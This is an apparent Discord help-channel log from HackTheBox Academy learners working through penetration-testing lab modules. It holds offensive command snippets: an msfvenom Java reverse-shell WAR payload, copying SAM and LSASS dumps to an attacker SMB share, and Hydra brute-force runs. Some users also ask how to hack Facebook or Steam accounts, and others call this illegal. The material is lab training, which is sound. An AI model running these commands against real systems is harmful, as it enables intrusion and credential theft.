#modules

i did it with my own kali vm

lemme try with my own

Try it with the other domain.

its in progress but its slow

almost there

Hello man I have a problem I must to exec this tools but there arent' possibilty to update and to have my librairu

it went back

Installed windows with dual boot on mac. Hating macos till this day. Couldnt run most of my c# programs in college without changing stuff.

Hello

https://academy.hackthebox.com/module/158/section/1439

I search the direcotry but it is not here

We can start by downloading the appropriate binaries to our attack host to perform this attack.

Pls guys I hve successfully access the script but I’m still struggling with the right script to automating going through each module one of the other or if someone have a easy method to get the hidden flag let’s he or she help me, this it’s user7 ? Of windows command line skills assessment 🙏🏻

its still stuck

Hi im on the “initial enumeration “ section on the Active Directory module where we should use xfreerdp into a user so we can scan the network with wireshark,nmap but i cannot get xfreerdp to work since the section only gave me a username (htb-student) and an ip address of (172.16.5.0/23), what do i do?

Try HTB_@cademy_sdnt! or Academy_student_AD!

Otherwise check the current or previous pages and try one of those passwords.

Hi. im on the linux privilege escalation module, think im being stupid but im on the first question (enumerate the host and look for interesting files that might contain sensitive data). Been on it for 30mins tried to access anything i can think of and anything the modules mentioned so far and i have nothing. Anyone got any ideas?

you can grep for the flag. think about how the pattern or format of the flag will be like.

Surely theres a better way to do it than that? And i cant just grep throughout the whole system can I wouldnt i have to know which file its in etc?

Can someone help me with the section "Weak Public/Private Keys" in the "Attacking Authentication Mechanisms" module?
I have completed the module and the skill assessment, except for the "Weak Public/Private Keys" section. I followed all the instructions but it doesn't work. Any help is very much appreciated.

why not?
you can just redirect the stout to discard the errors.

the flag you are looking for might not be your generic "flag.txt" or "666somethingflag.txt"

So i can just do grep "*flag.txt" 2>/dev/null ?

no, you are using grep to search for strings in a file.

Yeah thats what i mean, ive searched across the whole system but cant seem to find a file that would provide me the flag. I could do grep "HTB*" if i knew the file right?

*if you knew how the format of htb flags are.

grep is used to search for the pattern of a string within let's say a file.txt.
find is to search for files named file.txt

https://www.wikihow.com/Use-Grep#:~:text=Things You Should Know 1 The syntax to,use grep -R to perform a recursive search.

Yeah i get that, but I cant find any files where the flag would be in, i cant see how grep is going to help me with that since ive looked through the files manually and cant find a flag

maybe you are not adding the correct switches.

grep -irl
the options are explained in the command line, or in the article ^

Im not sure you understand my issue, the whole thing is the question asks to enumerate the system to find interesting files which may contain a flag. I've gone through all the ones its mentioned in the module so far (not many since this is the first question) and any more i can think of from other modules ive done. Nothing comes up. I dont wanna cheese it and use grep since thats clearly not the point of the question

this is one of those sections where trying everything shown out there won't get you the answer ¯_(ツ)_/¯

and using grep is not cheesing

i see, so the only way to do it is to use grep? but then also how am i meant to know what file the flag will be in using the find command doesn’t give me anything? sorry im making this difficult

you wont, that's why you are using grep.

you can read my earlier mgs, if the flag was named flag.txt, you can just use find.

you will know the file name and the loc, after grep has searched for the format of the flag.

hey i am new. i was thinking of taking SOC path. but its specified as medium difficulty. i am noob. where do i start for SOC?

just think of how the format of htb flags are.
and use it in; grep -irl "xxx" / 2>/dev/null

so from the home directory i do grep -irl “HTB” 2>/dev/null?

thanks for pointing it out, no it should be
grep -irl "xxx" / 2>/dev/null

It will start from the root directory, you can issue it anywhere.

I see ill give that a shot and see how i get on thank you

Linux privilege escalation -- skills assessment: need to get flag 4 and 5. I have credentials for the Tomcat application but i cannot find a way to exploit it (war files dont upload, MSF modules didnt work). Anyone a nudge?

That hasnt worked i just ended up with a insanely huge list of paths?

You are probably generating a wrong payload with msfvenom.

What was your command?

msfvenom -p java/shell_reverse_tcp LHOST=10.10.14.168 LPORT=1337 -f war -o revshell.war

grep -irl "HTB" / 2>/dev/null

Use the one here #modules message

take a look at the SOC Analyst Prerequisites skill path

The string HTB can be contained in a lot of files

i would also do Information Security Foundations

What next character usually comes after that in the flag?
Add it.

got it now, so is the only way to do this question by using grep?

thanks youve been so helpful

Not the only way, but this is a simple regex.

I see, feel like that question could be worded differently. When its specifically asking to enumerate for interesting files that might contain senstive data youd assume it wouldnt be in a filename that isnt interestingly named

Yup, one of “those” sections.

Fingers crossed the rest of the module isnt like this, one of the bad things about HTB is the modules have no consistency in quality between them

The module is nice, it’s just a poorly worded question I think.

Something I experience a lot; magic questions that take sometimes long before you understand what they are asking. Luckily there is a good support here 🙂

i'd argue interesting file contents can have equally interesting file names, e.g., password.txt has a password in it, and you can easily find that by doing find / -name '*password*'

Yeah true, but in this particular sec, the file name was changed too lol

😦

unless you add with awk or something,

<@&861185840277487616>

Hey y'all, got a question about prereqs for y'all. Sorry for the many words.

Been working towards a different certification (not on HTB) and was unsatisfied with their training materials, so decided to switch my primary learning platform to HTB for the rest of the info I needed for that cert. So I'm picking and choosing stuff from the CPTS path to learn, making sure I understand the stuff covered in the listed prereqs for each module before starting.

So, I was working through "Pivoting, Tunneling, and Port Forwarding", and everything was going super well until I got rather stuck on one question in the "Skills Assessment" section. When I checked the hint, it referenced ||LSASS|| which is something I've not touched on at all quite yet. I figured learning about that subject would come in modules about Active Directory, which are not listed as prereqs to this module, and come much later in the CPTS path.

Is there some prereq I didn't see and that I'm missing, or something I misunderstood about knowing "what I should know" before getting started on a module? Or is this something that should be adjusted to help with students' expectations?

@soft cedar Hate to be asking again so soon, but the next question asks for the latest version of python on the target. I do python3 -VV and get 3.8.10 but apparently this is wrong?

Yeah, there’s a prereq found in Password Attacks module.

Ahhhhh, gotcha. Thanks a bunch; didn't figure I'd find that there, but that makes sense!

iirc I used find to search for the python3 path or strings maybe.

Got it, that hint helped thank you

Morning all, has anyone done this section

It would be easier for people to help if you just ask your question.

The hardest section in all the CPTS xD

Can devin AI write down creepy malware& ransomware

?

Hey folks, I'm stuck at Password Attacks - Medium Lab. I've got the zip file and a couple of usernames but I've had no success with password cracking so far. Could you please give me a nudge here? Let me know if I can DM you if you have completed this lab.

Find a way to crack the zip.

Hi guys ! i m working on htb academy introduction to file inclusion and on the automated scanning section i found the unique flag present but it doesnt work. (i m a beginner but i've played htb for some hours now and i think this is a bug) Can someone help me ? 😄 thanks a lot !

https://academy.hackthebox.com/module/233/section/2554 for this section, splunk is not loading at all. tried yesterday and today, and it isn't working for my friend either

splunk is loading for leveraging windows event logs though

Not a fan of Citrix Breakout section in Windows Privesc module... Making me real angry, hope the rest of you are having a better Tuesday than I am.

My condolences

It's possible that box is used for a different section along with what you're currently doing or accidentally left there from some other use.

Or if you are certain it's the correct flag make sure there are no extra spaces and it's formatted correctly.

Can I PM anybody about Attacking Common Services / Attacking DNS?

I can't get subbrute to work after resetting the box. Looked through every other response here and feel like an idiot rn

I am using pwnbox

Put the ip in the resolvers file or w/e it's called

omg

you're my hero

Make sure it's the resolvers for subbrute, should be the same directory.

someone check out if their splunk loadshttps://academy.hackthebox.com/module/233/section/2554

Target IP:8000 not working in the zeek but working in the windows event logs section

are the labs not working?
downloaded new vpn and restarted the machine several times I'm on windows privilege escalation interacting with users

yeah seems my target isn't spawning either, but a different module

Don't use eu-academy-exams-1 if you were using that

which module is this

under maintenance

that is splunk with windows under the zeek section

nvm, my target spawned after a few minutes

maintenance is on 16/4 no?

https

❌

Contact fb

interesting comment

use https to access splunk

❌

contact facebook

<@&861185840277487616>

piss off bot

dont click that link people

did you try https?

https works

ok good

got it

what did i miss?

the link too

free steam?

idk some facebook thing

nah, hack my facebook account shit

crypto?

facebook account recovery

facebook "account recovery"

ahhh

good that i don't have FB 😛

Second one got deleted as I replied to it

I got it brotha

❤️

i dont got cwee i don't know how to do website stuff

well it's illegal anyway

You don't need cwee to do website stuff

But also hacking and doing account "recovery" is illegal

bloke sent me a friend request

20 week streak

6 more, then there's the next badge

I'm actually running out of modules to cheese with, time to do more

yeah i ve been speaking with an admin and i accidentaly swap machine from academy to lab machine and retrieve the flag from htb lab 😛 at least that s cool !!

https://academy.hackthebox.com/module/143/section/1486

need help: stuck on at this section. for context I study on my work computer.. at work. and other times at home. So my notes are split up and not ideal i know. the write up here uses "wley" to change "damundsen" password. I tried following exactly that but "damundsen" either doesnt exist or I am missing wley's password. OR im supposed to use ||"forend"|| user from the previous section? either ways im assuming im missing ||forend|| or wleys password right?

using that first line in PS "$SecPassword = ConvertTo-SecureString '<PASSWORD HERE>' -AsPlainText -Force" .. <PASSWORD HERE> actually needs a password.

Usernames and passwords are reused in this module

That section is a walkthrough, so you will need wley's password

thanks guys! I dont have notes for that section on my work computer

You use the creds of the user to authenticate that you are who you say you are to authorize the password change

gotta redo a section to gain wleys password

I suggest using a sync method like pushing to a private gitlab/github instance for notes

ive never tried writing my notes there but I should start

The part of Python in this section : https://academy.hackthebox.com/module/145/section/1343 is to explain how works SSTI in Jinja2?

Because I just used a tool to have a shell.

Hi in Active Directory Enumeration & Attacks (Module) : Initial enumeration of the domain (Section),
the command : "kerbrute userenum -d INLANEFREIGHT.LOCAL --dc 172.16.5.5 jsmith.txt -o valid_ad_users" is used to enumerate for valid users.

But the -o flag or the --output doesn't seem to work. Further down when i cat the file nothing seems to be in the file "valid_ad_users".

Should i restart my session or should i reinstall the tool on attack host (attack01)?

is there a way to read what I wrote for "$Cred" in powershell?

Echo $Cred

Thanks ❤️

Does the file exist?

okay new error, WARNING: [Set-DomainUserPassword] Unable to find user 'damundsen'

hello, i'm stuck at the attacking SAM in Password Attacks Module. I tried to get the system.save by many ways with no luck, even i connect my windows to OVPN try to copy from share folder , any hints?

What ways to extract files from the victim system to your host have you learned about in this module?

yes, it's smb, i also tried something like ftp but alway network error

Are you connected to the target in any way?

Are you using the pwnbox or a vpn connection?

yes, elvil-winrm also no luck

Why are you not using rdp?

my ping to the pwnbox always over 200+, i cant

Do you have a local vm set up?

yes

So connect via VPN to the academy network then RDP to the target host.

Then leverage the tools and techniques you have been taught in the module.

Also most rdp tools have a drive mount option

Xfreerdp has /drive: for instance

Sure you can do it but it is just as easy to just follow the instructions of the module.

Well yeah

tried

Is that the sharename and such?

that's example from AI

Well AI doesn't know wtf it's doing

You can't replace critical thinking with AI

Using xfreerdp, add /drive:name,/tmp/

i went to the mount point, when i use "cp" command, my VM was frozen in about 5 mins then i turn off my VM

Many ways like smbserver, u can even straight up do python web server and just put the file on ur server

Mate, they literally give you everything that is needed in the module. Just read it again from the top.

using iwr

like the module itself literally walked you through how to do it

And you'll see the <name> pop up in the file explorer

It is move not "cp" but "move".

cp works in powershell

Spin up the smb server with impacket then move the files to smb share via cmd and "move" command. That's it.

Ofc it does but he should stick to what the module is teaching as he is already having trouble with that.

move system.save \10.10.x.x\CompData
i tried this first, in about 1 hour then respawn the target, no luck...
i think the size of file is problem

It's not the size of the file

Did you open an smb share named CompData

Moving the file will take less then 10 seconds.

maybe I'll try again after going for a walk, thanks guys...

ls and curl does too. I think curl in powershell is basically an alias for Invoke-WebRequest

Actually, the first method works, but it keeps having connection errors during the file transfer process and leads to the file not being completely transferred (I compared the file size and the transferred file is still in protected when using rm) but lost connection, I've been trying continuously for hours, it's tiring

yep so does wget, they're just aliasing similar ps cmdlets to the linux equivalent

these completely work:
C:> move sam.save \10.10.15.16\CompData
1 file(s) moved.

C:> move security.save \10.10.15.16\CompData
1 file(s) moved.
but the last was not

how is this not 6??

@fathom pendant

ssh in my guy

I tried compressing it directly on windows its size was only 2.2 mb but still the same

Because you need to ssh to the target

Again: it's not the filesize lol

I was able to do the raw file just fine

i did that and 20 is still not correct

is the command i use correct?

If you’re ssh in, that command would be fine ig

But then you have to answer it correctly still

No localhost, and ipv4 only

Look at the ports too. You have services using tcp and tcp6. Each service will bind to its own unique port.

does that mean "NO LOCALHOST"... "SELECT IPV4 ONLY"

.

?

look above at what i said

It means exactly what I said

I'm able to get the answer pretty easily

maybe take a look at what the question is asking

It means those not listening on loopback or ipv6

bruh. even this didnt work: netstat -l| grep -v "localhost" | wc -l

Bruh, loopback is also 127.0.0.1

And in netstat it will show as the ip, not name

this didnt work either: netstat -tuln| grep -v "localhost|127" | wc -l

|

*netstat -tuln| grep -v "localhost|127" | wc -l

\ escape

Wrap the command in backticks

theres an absense on forwad slash biut i used it

Btw

like this

oh yh.. i knew that

Try just evaluating the output without wc

Because it looks like it's also counting ipv6

Which the question explicitly tells you only ipv4

huh? 127 and localhost?

(Not on localhost and only ipv4

Has anyone done the new Orion prolab?

oh -v, derp

tbh, just look and count

In seriousness, get rid of your wc, and count them manually, you're looking for tcp, and not tcp6, and IPs of 0.0.. or the IPs of the box

Wrong channel my dude I don't think there's a channel for it yet but you can read and follow #welcome to access more of the server

but arent ipv6 addresses 16bits blocks? im not seeing 16 bit blocks in the list

ips of 10.0.0 is good right?

i apologize to everyone

this was the error....

i never read it.. just saw error

dont block me

Possibly, I don't remember which module/section you are working on and if it's a fundamentals I don't have notes for it.

just count all 0.0.0.0 and ignore udp

https://tenor.com/view/it-be-like-that-sometimes-like-that-sometimes-snoop-dogg-sometimes-just-like-it-gif-12501830

well, you can see this as an opportunity to improve the usability of the site

make the error say " MODULE ERROR" instead lol

Ipv6 are 1111:2222:3333:4444..., loopback on ipv6 is ::1

Anytime you see :: it's an implied 0000

https://academy.hackthebox.com/module/145/section/1346

I am trying to inject ||SSTI|| because it's a ||python server|| and should use ||flask|| but I tried some payloads to test if I was in the good direction but no one works for this type of vuln. By the way, I tried to use a tool (||SSTIMap||) but nothing as well (default level).
Moreover, in the module we have ||2 args/parameters|| and the final test tell us this : ||"without register an account"||, but I tried to see something in the different ||POST|| request (||register and login||) but only ||register|| was showing the something correctly if we spam it with same values, but no vuln discovered, I don't know what to do :(.

And it can span any number of sets

ahhh i see

So 1::1 would be 1:0000:0000:0000:0000:0000:0000:1

Also: according to standard there can only be one :: in an ipv6 set

thanks for eplaining

imma sub again

So you can have 1::2:0000:0000:3

But not 1::2::3

Convention is to truncate the longest stretch of 0

i see. :: can be 3, 4, 5 or 2

Or 7

In the case of ::1

perfect eplanation there. so much knowledge

Should just watch a tutorial on networking

basic networking stuff ¯_(ツ)_/¯

ive taken the cisco course on network fundamentals

Retake it

im taking it*

should i do that first then come here or...

Well fundamentals are important

u kno what funny. I started doing the pen test job path, then someone recommended i go for linu fundamentals. So i began doing that, and now yall telling me to go back to network fundamentals

when i start doing that, theres gonna be someone teling me to go back to ABC fundamentals lol

If someone know 🥺.

I surrender

You need network and Linux fundamentals. Actually there should be a fundamental path on academy

Not sure in what order they do it, but I’d work through that

It's like halfway down that list

u sure u set up the smb correctly?

I think I was right, because I was able to get sam.save and security.save

this pentesting thing was a lot easier in uni. Literally scored a distinction

Well it likely wasn't as in-depth

I will try hashdump with metasploit

which module u doing?

Why hashdump?

Secretsdump works fine for sam and security saves

it was very fun. had to perform various attacks to get into a target system

Again: likely not as in-depth

^

I want to experience everything they mentioned in the module, it seems impossible

And sounds like potentially they just gave you attacks and commands they run

Sometimes you can't do everything from the module, but I don't recall using hashdump for this section

I've barely touched metasploit except where it was explicitly the only showcased option

all that for a fancy degree

That's worth little-to-nothing

Have you ever tried this module? Did you get the system.save file?

Well I looked at the forum and imo it's...disappointing.

If you followed the section it should have had you create a sam, security, and system iirc

System isn't always required but sam and security are

sadly so

Just checked: it's literally the first thing it has you do is create a sam, system, and security.save file

These modules are more of a headache than the lab

bro is stressed

I suggest taking a break

I'm under the shells module and am trying to get the version of Powershell running on pwnbox to answer the challenge via $PSversiontable and am getting back 7.2.1

Am I missing something?

Well, thank you guys, maybe I was thinking too much, I'll simplify it with crackmapexec

edition, not the version

^

😐

Thank you.

Reading: 1 :: UriEl: 0

      MMMM_    ,..,
        "_ "__"MMMMM          ,...,,
 ,..., __." --"    ,.,     _-"MMMMMMM
MMMMMM"___ "_._   MMM"_."" _ """"""
 """""    "" , \_.   "_. ."
        ,., _"__ \__./ ."
       MMMMM_"  "_    ./
        ''''      (    )
 ._______________.-'____"---._.
  \                          /
   \________________________/
   (_)                    (_)```

Have a bonsai tree 😛

Looks like a bath

can someone help me with unfied

Not here

Read and follow #welcome to access #starting-point

kk

Ayo wat

Froginnablender.

thanks

Banned

Yea

:/

I've had this issue too

Bypassing Blacklisted Commands
hey some one can help me to this section in command injection module

Hi guys! I hope you're well. I'm trying to use Responder with Pwnbox. RDP into target. RDP won't work from Kali for some reason and Pwnbox has port 80 in use. I tried to kill it but no joy. Is this a thing? I'd really love to use Repsonder right about now 😄

I'm on Interacting With Users, Windows Priv Esc

Trying for some malicious SCF action

Nevermind. I'm a silly sausage.

sure what's up

thanks bro but i did it

Can I DM someone to get a second set of eyes for my payload on the Http Attacks skill assessment

question, im doing the sqlmap essentials module Running SQLMap on an HTTP Request. so on the last question it says its vuln to sqli in a json value. im just looking if there is a better way to get the json request and how would we know to check for the json before hand bc this just tells you its in a json request. i went into burp since i couldnt find the json via curl

nvm nvm im just being dumb lol

1 to go

hello I'm very new to htb academy and im currently going through path infosec foundations.
Do I really need the windows and linux pentest environment that are set up in the modules?
More specifically, later introductions modules like "bash scripting" require these VMs setup?
I thought pwnbox would suffice, as a beginner, but maybe its better to set them up for the long run(?)

Practical Digital Forensics Scenario

Extract and scrutinize the memory content of the suspicious PowerShell process which corresponds to PID 6744. Determine which tool from the PowerSploit repository (accessible at https://github.com/PowerShellMafia/PowerSploit) has been utilized within the process, and enter its name as your answer.

On this question we are supposed to look at the link itself or the process mentined on the module? because I look it up like windows.pslist. windows.cmdline and the encoded command can't find anything usefull... I am misisng somethin here?

the link is for reference, it has a list of tools to choose from

check interesting logs that could be related to the execution of PowerShell commands

The fundamentals cover more than the pwnbox and labs. They are broad fundamentals for windows and Linux and basic scripting

got it, thanks

I recently switched from windows to Linux. It literally feels like I broke out the matrix. Linux so much better and has so much more mercy on my low RAM PC.

linux is like reading the matrix code

Yes I still have much more to learn. But so far I never knew I could love a operating system this much. I love Linux as much as I love my puppy.

Long Live Linux!

https://academy.hackthebox.com/module/143/section/1489

if im understanding this correctly, I need to move 'secretsdump.py' to the parrot host on 172.16.5.225? I tried looking for it there but dont see it. My attack host (vm) cant see 172.16.5.255... unless section wants me to use port forwarding?

@dire abyss nope the parrot host already has secretsdump. The attack hosts in this module already have the required tools

Also you can access the parrot host via ssh on the target

yeah I ssh'd with powershell and have it up right now from MS01

im not in deep, let me respawn

You can open powershell then ssh

You don't need to respawn

alright about to clock out from work, ill jump back on from home, thank you

let's keep this ontopic, please.

@valid viper

am i doing this wrong? trying to get the flag for julio

Never had this problem before but I cant RDP to a target. Wondering if anyone can tell what I am doing wrong. Iv also reset all machines. ──╼ [★]$ xfreerdp /v:10.129.19.50 /u:Administrator /p:AnotherC0mpl3xP4$$
[01:53:49:913] [5042:5043] [WARN][com.freerdp.crypto] - Certificate verification failure 'self signed certificate (18)' at stack position 0
[01:53:49:913] [5042:5043] [WARN][com.freerdp.crypto] - CN = MS01.inlanefreight.htb
[01:53:49:114] [5042:5043] [WARN][com.freerdp.core.nla] - SPNEGO received NTSTATUS: STATUS_LOGON_FAILURE [0xC000006D] from server
[01:53:49:114] [5042:5043] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_LOGON_FAILURE [0x00020014]
[01:53:49:114] [5042:5043] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[01:53:49:114] [5042:5043] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1

Try remmina

remmina? I hardly know her.

(looking into this)

Oh... gui

interesting

Well I'll be... that worked

hrm... I wonder why xfreerdp is broken

says logon error

maybe do xfreerdp /v:10.129.19.50 /u:Administrator /p:'AnotherC0mpl3xP4$$'

the target is not spawning for https://academy.hackthebox.com/module/176/section/1791

was on this module trying to progress despite the latency when it seems to suddenly crash. respawning the target left me waiting for the past 20 minutes.

Hello! I'm having trouble with this, I get what your saying to convert the time and all that, I just have no idea where this stuff goes in the reset_token_time.py script and the module gives ZERO help on it, just assumes i know where stuff goes in the code. Any help on this would be awesome thanks!

remmina > xfreerdp 😛

Looks like a problem with certificate, I had an old lab machine that gave me a cert error and using the option /cert-ignore it worked, try it

Skill issue

You're so original 😁

People like you are why I love this field, truly.

Hahaha I just prefer xfreerdp

I don't.

It doesn't work most of the time. I have better things to do than troubleshoot broken tools.

afaik xfreerdp works just fine out of the box

It's not broken, maybe you have bad version or there's some missing library

In my machine it just perfect

🤷‍♂️

is it worth doing the infosec fundamentals path before the cpts path or does the cpts path teach you the fundamentals?

it was what pixelrazer said, he didn't have the password in quotes and it has chars linux ignores

It gets down to basics pretty thoroughly.

Depending on what you're referring to.

It's incredibly thorough, I'll say that much.

infosec fundamentals path has stuff like intro to windows and linux, intro to command lines, intro to networking, intro to AD, a lot of intros and i think all the fundamental modules

idk how much of that is covered by cpts

and idk if i want to spend my time on the infosec fundamentals path before i do cpts if the cpts path is just going to cover all of it anyway

Oh neat. Yeah if you don't know Linux or how to use a shell...

I would probably do that first.

i mean there’s a lot of it i already know

i might just skip around the infosec fundamentals path

actually it probably couldn’t hurt

the infosec fundamentals path is a prerequisite to the cpts path

so you're expected to know everything from that path

if you're not up to snuff, perhaps you should do it

will do, thanks

Nibbles -initial footprinting

Gain a foothold on the target and submit the user.txt flag

i know that there is an admin.php under /nibbleblog/admin.php but how can i login? use hashcat? i know the username credential, which is admin

didn’t you learn a basic reverse shell in that module? i would try that. i dont think hashcat is used for that lab

but i haven login to the page yet to access the plugin tab

i dont think you dont need to login, you need to enumerate more.

well you'll need some basic python knowledge for this, the conversion needs to be done once to set the now variable

How long time I am supposed to wait? https://academy.hackthebox.com/module/57/section/491

Good day, can someone point me to help me ask this question. List the server carefully and look for the flag.txt file. Please submit the contents of this file in response. module -> Footprinting

what section and what are you stuck on

Hi guys

I need someone now to get answer for Nearpod app

If any one can help😁

Hello, is there anyone that could give me a little hint about xss assessment? I think I'm doing everything right, but I can't get the cookie. I found the vulnerable field, I found the correct payload, and I can see traffic on my php server, but there is no cookie saved.

Of course tried like 15 different payloads to get the cookie

Is it only me who is having issues to move files to the windows vm in advanced deserialization attacks module?
Specifically the debugging .net apps where I am supposed to load the given website in a iis but the machine is extremely unstable and rdp connection dies every minute or so 🤔

guys how i can earn htb cubes cause im stayed at 30 cubes (im beginner)

<@&861185840277487616>

Each module can unlock a certain amount of cube ( answering to questions and task) or you can buy them in the academy shop.

footprinting easy lab

Make an educated guess based on the box name

It's also given in the section

I also do not understand why for example the same payload works for the 5 times in a row, and then stops working and suddenly I can't see trafic on my php server. Not gonna lie - im getting frustrated, because I really think there is something off about the vm

With money

@killnet_edc not long 2 minutes max

i need Amazon gift card pls

And I need $10000

same

Why do you "need" Amazon cards?

Because

You can buy them on amazon

i have no moneys

then you can't get them

ahhhhhhh

i will be a super baby

suger

wrong server

ahh

lmao

new shit here every day

HTB should start making amazon cards giveaway

-s

Does anyone know what I could have done to block incoming connections to Kali? I have UFW but even disabled, I can't catch revshells on tun0. Can't use simple server to host. I've tried testing it using the same address from the same machine and everything works right. I think UFW did something that I can't find/undo.

Hey everyone, hope I am in the right place for this question:
I just started with HackTheBox and am currently on the "Redeemer" level, which requires me to access a Redis DB by using "redis-cli -h <IP>".
After running that command, nothing happens - my console seems stuck trying to connect and I have to opt out with control + c.
Any idea what the issue could be? I am using the Parrot OS.
My nmap scan also took unusually long (around 20 seconds) compared to the previous levels I did.

The IP in question is 10.129.32.193, in case that helps.

This channel is for htb academy modules, #starting-point is for the starting point machines, read and follow #welcome to access it

Apologies 🙂

can you post a Screenshot of your payload? im assuming it a valid payload since it worked 5times already

Pls Post a screenshot and the name of the module

Guys i spawned the Citrix Break exercise from Win privesc module . For the past 15 min it doesn't give me an ip , just spinning forever

Hey, there is this one question in "Scanning Services", where it asks for software version of application running on 8080. However, the intended way doesn't work since nmap doesn't recognize the version, and the version from fingerprint does not work

Try the name of the service

With 2 words

ayee that's it, thanks!

It's looking for the answer in the "version" column

right, but that one is empty for 8080

Well I was waiting for more than 15 min...

hey i am on sqlmap essential case 5 , i get the flag but it broken in to htb{blah_blah}_blahblah}

what should i do

https://academy.hackthebox.com/module/58/section/526

What did you do to get it?

Sometimes it's dumb fron what I remember, but you got the answer yeah?

yep I got it, thanks 🙂

help

Try with curl and not the file.

😭

its been a while since i did this, every thing looks good except -p flag is that necessary cuz you already gave a request file right? idk just double check on that

i am getting a flag but its not getting accepted by module

hint of question is :You can use the option '-T flag5' to only dump data from the needed table. You can use the '--no-cast' flag to ensure you get the correct content. You may also, try running the command a few times to ensure you captured the content correctly.

Send me in DM your flag.

Why isn't it correct?

edition, not version

I used a translation program and totally missed it.

how u did those red lines

try to do it from pwnbox

its fast for network related task

Probably ~ 30 minutes. Maybe it's set up to allow more threads

hmm t is very less

-t 4 because it's SSH.

try it from pwnbox

I am doing it.

Multiple threads allow parallel attempts

I know the password but would like to get it myself...

for me hydra never took more than 3-4 min

Just be patient

just try t 16,32,64

hey marcie

Grep for the right password with grep -n "<password>" to see what line it's on to get a gauge how long it may take

I know the line of the valid password.

Then you can do some light math to see how long it may take, line #/#triesperminute

Well it's better.

-t 16 works.

👍

Well the password is good, thx :).

i alwasy try with max t

You generally don't wanna do that. At best (in a normal scenario) your ip gets blocked, at worst you dos the server

it's a tool called flameshot, you can take a screenshot and then easily edit it

nah i was talking about in modules

Don't get in the habit of doing things poorly

if i don't do that in module it would take 30+ min coz of 180+ latency

Again. Don't let yourself form bad habits just because

yes

Last time it took me 15min to scan an IP. Cooked myself something nice while i waited

I am trying with the "normal" port for FTP but I had to reset before so I did not see if it was good, it should be 21 or the default port of the lab?

https://academy.hackthebox.com/module/57/section/491

Well, not working as well.

Could be that you're using too many threads

With the default or 21 xd?

Either

Okay :).

Some threads look like they died so didn't finish resolving

Maybe but I did a big error, I fixed it :), thx.

For the labs, 48 threads tends to be the most stable

👍

I am doing the 1st of last tests.

Anyone available for sparring on ADCS skills assessment? Want to understand what I am missing as I go through this assessment, as I am stuck in the beginning portion and have made my way through several attempts of ESC8 and ESC11. thanks in advance!

Why I am getting a lot of ... ||user|| accounts?
hydra -l ||user|| -P Desktop/wordlists/rockyou.txt xxx -s xxx  http-post-form ||"/xlogin.php:xx=^USER^&xx=^PASS^:F=<form name='lo-gin'"|| -I https://academy.hackthebox.com/module/57/section/515

Probably because your fail is drunk

if it's esc8/11 then coerce and relay

?

I reseted btw.

BRO I AM STUPID.

Insult me lol.

😭

I will not, and my reply was a hint

I just placed wrongly ONE character bro...

Yeah I know lol.

Thx 😭.

Thanks..

quick question, when setting WPAD record , every machine traffic get proxied to our attack machine even if the AD network was firstly unaccessible direclty to us?

Hi all, is there any way to delete the answers for academy modules's sections? I want to retake the entire path and I would like to go blind again with it. Is it possible?

Just refollow the path but don't look at the flag for each section?

hello, im stuck here: Attacking LSASS
i could not get the lsass.dmp file to my attackbox, tried many ways

Can you elaborate more, I don't understand the question ?

Which error do you get?

C:\Users\htb-student\AppData\Local\Temp\share>move ".\lsass.DMP" "\10.10.15.26\share"
An unexpected network error occurred.
0 file(s) moved.

No \\10.10.15.2\share

no discord filted

it's \

\\

Okay, did you setup the smbserver ?

sure, like in the module, i tried with ftp still no luck

What about upload it with Http

?

hey guys!

was it unauthenticated?

does this server teach hacking?

sudo impacket-smbserver -smb2support share .
is this okay?

Try with -username user -password pass

set it with a username and password.

can anyone tell me?

In the windows use net use \\ip\share /user:user pass

Then move file \\ip\share

hey!

Yess

I think that's not a problem, I can transfer the files from the previous lesson about a few tens or hundreds of kbs, but the file system.save and this lsass.dmp are about a few dozen mbs so it's not possible.

Use http

Tried it, timeout was too long

Weird, even FTP didn't work

?

U can get a rev shell via metersploit

And using the inbuilt download function

yes, hashdump is the final method

i dont want to waste much time

ig Hashdump is different than lsass

What do you mean ?

Hackthebox has modules for teaching but they arent for illegal stuff like how to hack into my friends computer or how to hack a discord.

Hackthebox can teach you/prepare for cybersecurity related jobs

my thinking, check the net user then ...

I’m talking about how you can transfer lsass

sorry if it was wrong

He means Hashdump from metasploit

where do i start?

Yeah and you replied him that’s it’s a different thingy

yes, the question to get user's password hash then crack it

I used msf to download the lsass when I did that section.

I was also getting timed out by other methods.

Have you done that part yet? Could you please check it for me, how did you get that lsass.dmp, am I going in the wrong direction?

Oh so you have the same problem?

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

I already told you.
I have a latency problem so I couldn’t use smb / https

@shadow cargo

Craft a meterpreter payload and send it to the target and catch the shell via msf multi handler

I mean if the smb didn't work, just use metasploit

thank you, guys

Can I dm you about something else?

Me, yes ofc

Thanks.

thanks!

Hi, on the page https://academy.hackthebox.com/module/143/section/1265 , it says "A penetration testing distro (typically Linux) as a virtual machine in their internal infrastructure that calls back to a jump host we control over VPN, and we can SSH into." what does it mean by "calls back". Sorry not very clear on the network terminology

connects to

ohh ok, thanks

Good evening, I was wondering if this file contains expect (which handles interactive streams) expect://id This is not echoed in this experimental environment

I lose

help mee

That's why I use Linux xD

I never thought I would have to take this way . Should I write a support ticket?

Idts

Disappointed in my self I had to get a hint for attack web service easy. I did not foresee using load file 😩😩😩😩😩😩

It happens

That was def left of field

is anyone else facing this error while trying to install a module in drupal from attacking common applications

increase the timeout

you can background the session and do ;
sessions -i 1 --timeout 50 replace the 1 with the session number.

Maybe he can increase timeout is smbserver too, idr if there is an option in smbserver

for options I am not sure, maybe in the source code.

Well, apparently that impacket-smbserver doesn't have a timeout option

its for meterpreter.

There's -t in smbclient

to create snapshots you need vmware pro right ?

it works... when i set timeout to 120

damn 120 💀

this is so long...

hey, are there any discounts for silver annual subscription?
does everyone pay 490$?

1mb/1min

its around ~45mb iirc

lol to me, did it take you that long?

guys i hate to ask but does anyyone know how to hack steam acc

i will explain later

the download? think so.

What args should I add? https://academy.hackthebox.com/module/80/section/772

I added the URL to the page :

Thanks for your idea, @soft cedar , I think I need to rest a bit

I have to give a file name but I have still these errors, I just replaced vars to parameters in the page and setting the url (no .php file by default).

Maybe problem from pwnbox, use your own vm

https://academy.hackthebox.com/module/80/section/782
